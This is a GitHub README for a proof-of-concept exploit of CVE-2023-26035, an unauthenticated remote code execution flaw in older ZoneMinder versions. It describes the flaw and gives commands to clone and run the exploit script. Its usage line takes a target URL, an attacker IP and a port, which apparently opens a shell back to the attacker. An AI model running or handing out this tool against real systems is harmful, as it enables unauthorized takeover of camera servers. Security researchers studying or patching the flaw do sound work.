Skip to content

Latest commit

 

History

History
28 lines (20 loc) · 640 Bytes

README.md

File metadata and controls

28 lines (20 loc) · 640 Bytes

CVE-2023-26035

Unauthenticated RCE in ZoneMinder Snapshots - PoC Exploit

alt img

Description

ZoneMinder versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution due to missing authorization checks in the snapshot action.

Usage

git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>

Requirements

pip3 install beautifulsoup4

Credits

UnblvR discovered the vulnerability.